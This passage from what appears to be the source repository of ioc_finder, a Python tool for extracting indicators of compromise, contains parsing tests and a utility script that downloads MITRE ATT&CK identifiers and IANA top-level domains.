parse_domain_from_url=False, parse_from_url_path=False) 125 | assert result["domains"] == [] 126 | 127 | 128 | def test_issue_104__encoded_url_properly_parsed(): 129 | s = "https://asf.goole.com/mail?url=http%3A%2F%2Ffreasdfuewriter.com%2Fcs%2Fimage%2FCommerciaE.jpg&t=1575955624&ymreqid=733bc9eb-e8f-34cb-1cb5-120010019e00&sig=x2Pa2oOYxanG52s4vyCEFg--~Chttp://uniddloos.zddfdd.org/CBA0019_file_00002_pdf.zip" 130 | result = find_iocs(s) 131 | assert result["urls"] == [ 132 | "https://asf.goole.com/mail?url=http%3A%2F%2Ffreasdfuewriter.com%2Fcs%2Fimage%2FCommerciaE.jpg&t=1575955624&ymreqid=733bc9eb-e8f-34cb-1cb5-120010019e00&sig=x2Pa2oOYxanG52s4vyCEFg--~Chttp://uniddloos.zddfdd.org/CBA0019_file_00002_pdf.zip" 133 | ] 134 | 135 | 136 | def test_url__percent_encoded_path(): 137 | # make sure a percent encoded path is properly removed so that nothing is parsed from it 138 | s = "https://example.com/test%20page/foo.com/bingo.php?q=bar.com" 139 | result = find_iocs(s, parse_from_url_path=False) 140 | assert result["urls"] == ["https://example.com/test%20page/foo.com/bingo.php?q=bar.com"] 141 | assert iterables_have_same_items( 142 | result["domains"], ["example.com", "bar.com"] 143 | ) # the key here is that "foo.com" is not parsed because it is part of the path (which has been removed) 144 | assert result["file_paths"] == [] 145 | -------------------------------------------------------------------------------- /tests/test_utility_functions.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from ioc_finder.ioc_grammars import hasBothOrNeitherAngleBrackets, hasMultipleConsecutiveSpaces 4 | 5 | 6 | def test_hasBothOrNeitherAngleBrackets_1(): 7 | assert hasBothOrNeitherAngleBrackets("<>") 8 | assert hasBothOrNeitherAngleBrackets("") 9 | assert hasBothOrNeitherAngleBrackets("< foo >") 10 | assert hasBothOrNeitherAngleBrackets("foo") 11 | 12 | assert not hasBothOrNeitherAngleBrackets("<") 13 | assert not 
hasBothOrNeitherAngleBrackets("") 17 | assert not hasBothOrNeitherAngleBrackets(">foo") 18 | assert not hasBothOrNeitherAngleBrackets("foo>") 19 | assert not hasBothOrNeitherAngleBrackets(">foo>") 20 | 21 | 22 | def test_hasMultipleConsecutiveSpaces_1(): 23 | assert not hasMultipleConsecutiveSpaces("") 24 | assert not hasMultipleConsecutiveSpaces(" ") 25 | assert hasMultipleConsecutiveSpaces(" ") 26 | assert hasMultipleConsecutiveSpaces(" ") 27 | -------------------------------------------------------------------------------- /tests/test_with_hypothesis.py: -------------------------------------------------------------------------------- 1 | """Using hypothesis (https://hypothesis.readthedocs.io/en/latest/index.html) to test the finder.""" 2 | 3 | from hypothesis import given, settings 4 | from hypothesis.provisional import domains, urls 5 | from hypothesis.strategies._internal.ipaddress import ip_addresses 6 | 7 | from ioc_finder import find_iocs 8 | 9 | # @given(urls()) 10 | # @settings(deadline=None) 11 | # def test_url_parsing(url): 12 | # url = url.lower() 13 | # iocs = find_iocs(url) 14 | # failure = False 15 | 16 | # try: 17 | # assert len(iocs['urls']) == 1 18 | # assert iocs['urls'][0] == url 19 | # except AssertionError as e: 20 | # failure = True 21 | # print('Failed on url: {}'.format(url)) 22 | 23 | # if failure: 24 | # raise AssertionError('Error parsing urls') 25 | 26 | 27 | # @given(domains()) 28 | # @settings(deadline=None) 29 | # def test_domain_parsing(domain): 30 | # domain = domain.lower() 31 | # iocs = find_iocs(domain) 32 | # failure = False 33 | 34 | # try: 35 | # assert len(iocs['domains']) == 1 36 | # assert iocs['domains'][0] == domain 37 | # except AssertionError as e: 38 | # failure = True 39 | # print('Failed on domain: {}'.format(domain)) 40 | 41 | # if failure: 42 | # raise AssertionError('Error parsing domains') 43 | 44 | 45 | # @given(ip_addresses(v=4)) 46 | # @settings(deadline=None) 47 | # def test_ipv4_parsing(ipv4): 48 | # iocs 
= find_iocs(ipv4) 49 | # failure = False 50 | 51 | # try: 52 | # assert len(iocs['ipv4s']) == 1 53 | # assert iocs['ipv4s'][0] == ipv4 54 | # except AssertionError as e: 55 | # failure = True 56 | # print('Failed on ipv4: {}'.format(ipv4)) 57 | 58 | # if failure: 59 | # raise AssertionError('Error parsing ipv4s') 60 | 61 | 62 | # @given(ip_addresses(v=6)) 63 | # @settings(deadline=None) 64 | # def test_ipv6_parsing(ipv6): 65 | # iocs = find_iocs(ipv6) 66 | # failure = False 67 | 68 | # try: 69 | # assert len(iocs['ipv6s']) == 1 70 | # assert iocs['ipv6s'][0] == ipv6 71 | # except AssertionError as e: 72 | # failure = True 73 | # print('Failed on ipv6: {}'.format(ipv6)) 74 | 75 | # if failure: 76 | # raise AssertionError('Error parsing ipv6s') 77 | -------------------------------------------------------------------------------- /utility.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | """Python package for finding observables in text.""" 3 | 4 | import requests 5 | 6 | PRE_ATTACK_URL = "https://raw.githubusercontent.com/mitre/cti/master/pre-attack/pre-attack.json" 7 | ENTERPRISE_ATTACK_URL = "https://raw.githubusercontent.com/mitre/cti/master/enterprise-attack/enterprise-attack.json" 8 | MOBILE_ATTACK_URL = "https://raw.githubusercontent.com/mitre/cti/master/mobile-attack/mobile-attack.json" 9 | 10 | 11 | def _get_id(data): 12 | return data["external_references"][0]["external_id"] 13 | 14 | 15 | def get_pre_attack_data(): 16 | r = requests.get(PRE_ATTACK_URL) 17 | l = r.json()["objects"] 18 | tactics = [_get_id(i) for i in l if i["type"] == "x-mitre-tactic"] 19 | techniques = [_get_id(i) for i in l if i["type"] == "attack-pattern"] 20 | return tuple(tactics), tuple(techniques) 21 | 22 | 23 | def get_enterprise_attack_data(): 24 | r = requests.get(ENTERPRISE_ATTACK_URL) 25 | d = r.json()["objects"] 26 | tactics = [_get_id(i) for i in d if i["type"] == "x-mitre-tactic"] 27 | techniques = [_get_id(i) 
for i in d if i["type"] == "attack-pattern"] 28 | mitigations = [_get_id(i) for i in d if i["type"] == "course-of-action" and _get_id(i).startswith("M")] 29 | return tuple(tactics), tuple(techniques), tuple(mitigations) 30 | 31 | 32 | def get_mobile_attack_data(): 33 | r = requests.get(MOBILE_ATTACK_URL) 34 | d = r.json()["objects"] 35 | tactics = [_get_id(i) for i in d if i["type"] == "x-mitre-tactic"] 36 | techniques = [_get_id(i) for i in d if i["type"] == "attack-pattern"] 37 | mitigations = [_get_id(i) for i in d if i["type"] == "course-of-action" and _get_id(i).startswith("M")] 38 | return tuple(tactics), tuple(techniques), tuple(mitigations) 39 | 40 | 41 | def get_tlds(): 42 | """.""" 43 | r = requests.get("https://data.iana.org/TLD/tlds-alpha-by-domain.txt") 44 | tlds = r.text.split("\n")[1:-1] 45 | tlds = [i.lower() for i in tlds] 46 | tlds.append("onion") 47 | return tuple(tlds) 48 | 49 | 50 | print(get_pre_attack_data()) 51 | print(get_enterprise_attack_data()) 52 | print(get_mobile_attack_data()) 53 | --------------------------------------------------------------------------------